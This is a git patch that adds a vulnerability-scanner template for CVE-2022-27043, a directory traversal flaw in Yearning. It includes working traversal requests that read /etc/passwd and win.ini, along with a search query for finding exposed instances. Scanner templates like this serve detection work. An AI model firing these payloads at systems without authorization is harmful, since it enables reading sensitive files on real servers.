From 82bf13236119675d59ddc6d6d058ddafd84165e0 Mon Sep 17 00:00:00 2001 From: Co5mos Date: Tue, 30 Jul 2024 14:09:56 +0800 Subject: [PATCH] Create CVE-2022-27043 --- http/cves/2022/CVE-2022-27043 | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/cves/2022/CVE-2022-27043 diff --git a/http/cves/2022/CVE-2022-27043 b/http/cves/2022/CVE-2022-27043 new file mode 100644 index 0000000000..6cfff057b8 --- /dev/null +++ b/http/cves/2022/CVE-2022-27043 @@ -0,0 +1,32 @@ +id: CVE-2022-27043 + +info: + name: Yearning Directory Traversal + author: Co5mos + severity: high + description: | + Yearning has a directory traversal vulnerability that can be exploited by attackers to obtain sensitive information. The vulnerability is present in multiple versions of Yearning. + metadata: + fofa-query: 'app="Yearning"' + tags: yearning, lfi + +http: + - method: GET + path: + - "{{BaseURL}}/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd" + - "{{BaseURL}}/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini" + + matchers-condition: or + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: regex + part: body + regex: + - "root:.*:0:0"